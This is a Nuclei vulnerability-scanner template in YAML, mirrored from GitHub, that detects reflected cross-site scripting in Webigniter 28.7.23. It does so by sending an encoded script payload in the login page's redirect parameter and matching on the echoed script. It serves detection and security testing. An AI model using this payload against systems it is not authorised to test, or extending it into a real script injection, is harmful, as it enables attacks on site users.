mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-11 21:23:34 +08:00
42 lines
1.7 KiB
YAML
42 lines
1.7 KiB
YAML
id: webigniter-xss
|
|
|
|
info:
|
|
name: Webigniter 28.7.23 - Cross-Site Scripting
|
|
author: theamanrawat
|
|
severity: medium
|
|
description: |
|
|
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ycsz3"><script>alert(1)</script>bn76w was submitted in the redirect parameter. This input was echoed unmodified in the application's response. By using this Java Script injection, the attacker can trick a lot of users into visiting his dangerous URL which is reflected on the login form, before they log in, warning them that there is a problem with the login
|
|
reference:
|
|
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected
|
|
- https://webigniter.net
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
tags: xss,webigniter
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/cms/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w'
|
|
- '{{BaseURL}}/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w'
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<script>alert(document.domain)</script>"
|
|
- "Webigniter"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450221009e22f983946a712ea171f4ad09a5a11cf7696b0f84eeef92efa443ae707a836502206b720e7bef6f350a10abdf6efb7720170b3a554c906c4b5cdf0825368613fa24:922c64590222798bb761d5b6d8e72950 |